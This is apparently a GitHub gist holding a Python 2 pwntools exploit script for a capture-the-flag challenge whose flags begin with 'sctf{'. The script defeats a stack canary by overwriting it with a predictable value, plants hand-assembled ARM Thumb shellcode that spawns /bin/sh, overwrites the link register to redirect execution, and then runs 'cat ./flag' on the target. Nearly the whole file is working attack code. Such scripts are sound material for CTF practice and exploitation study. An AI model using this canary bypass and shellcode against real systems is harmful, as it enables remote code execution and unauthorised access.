@0xb0bb
Last active May 23, 2019 17:22
#!/usr/bin/env python2
from pwn import *
import sys
# context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
def fail(msg):
    """Log *msg* as an exploit failure (info level) and terminate with status 1."""
    text = "Exploit failed: {}".format(msg)
    log.info(text)
    exit(1)
def success(msg):
    """Log *msg* at success level and terminate with status 1337."""
    text = "{}".format(msg)
    log.success(text)
    exit(1337)
def main():
    """Drive one session against HOST:PORT (sys.argv[1]) and return the flag line.

    Every recv/send below is matched to the target's prompt sequence (': '),
    so the statement order is significant. Returns the stripped line read
    after sending 'cat ./flag', or None if any step raises.
    """
    INTRO = False
    HOST, PORT = sys.argv[1].split(':')
    try:
        # NOTE(review): the try body returns unconditionally on its first
        # pass, so this loop never iterates more than once; `z` is unused.
        for z in range(20):
            io = remote(HOST, PORT)
            # step 0: show sexy banner
            # drops the last 9 bytes of what was read — presumably the prompt
            # itself; confirm against the target's actual output
            banner = io.recvuntil(': ')[:-9]
            if INTRO is False:
                print banner  # Python 2 print statement (see shebang)
                INTRO = True
            # step 1: overwrite the canary with a predictable value
            io.sendline('1'+'\x00'*1023+p32(0x01))
            # step 2: fill up the stack buffer
            for i in range(15):
                io.recvuntil(': ')
                io.sendline('1')
            # step 3: now overwrite the stack copy of the canary at the same time putting shellcode in .data
            # binary is NX but everyone knows that QEMU does not respect NX, PIE or ASLR for QEMU system
            # because of limitations with the quick emulation model.
            pay = '1'+'\x00'*15
            pay += '\x01\x30\x8f\xe2' # add r3, pc, #1 ; 0x1
            pay += '\x13\xff\x2f\xe1' # bx r3
            pay += '\x78\x46' # mov r0, pc
            pay += '\x0c\x30' # adds r0, #12
            pay += '\xc0\x46' # mov r8, r8 ; nop
            pay += '\x01\x90' # str r0, [sp, #4]
            pay += '\x49\x1a' # subs r1, r1, r1
            pay += '\x92\x1a' # subs r2, r2, r2
            pay += '\x0b\x27' # movs r7, #11
            pay += '\x01\xdf' # svc 1
            pay += '/bin/sh\x00'
            io.recvuntil(': ')
            io.sendline(pay)
            # step 4: overflow the link register to take control over pc
            io.recvuntil(': ')
            io.sendline(str(0x11300))
            io.recvuntil(': ')
            io.sendline(str(0x11300))
            # step 5: trigger
            io.recvuntil(': ')
            io.sendline('0')
            io.recvline()
            # step 10: collect the flag
            io.sendline('cat ./flag')
            flag = io.recvline().strip()
            return flag
    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt and
        # SystemExit. If remote() itself raised, `io` was never bound and
        # io.close() raises NameError here instead of returning None.
        io.close()
        return None
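if __name__ == '__main__':
    # Script entry: require a HOST:PORT argument, run one attempt, and exit
    # via success() or fail() (both terminate the process).
    if len(sys.argv) < 2:
        fail('No target')
    flag = main()
    # main() returns None when any step raises; guard before calling a str
    # method so a failed run reports through fail() instead of an AttributeError.
    if flag is not None and flag.startswith("sctf{"):
        success(flag)
    fail("")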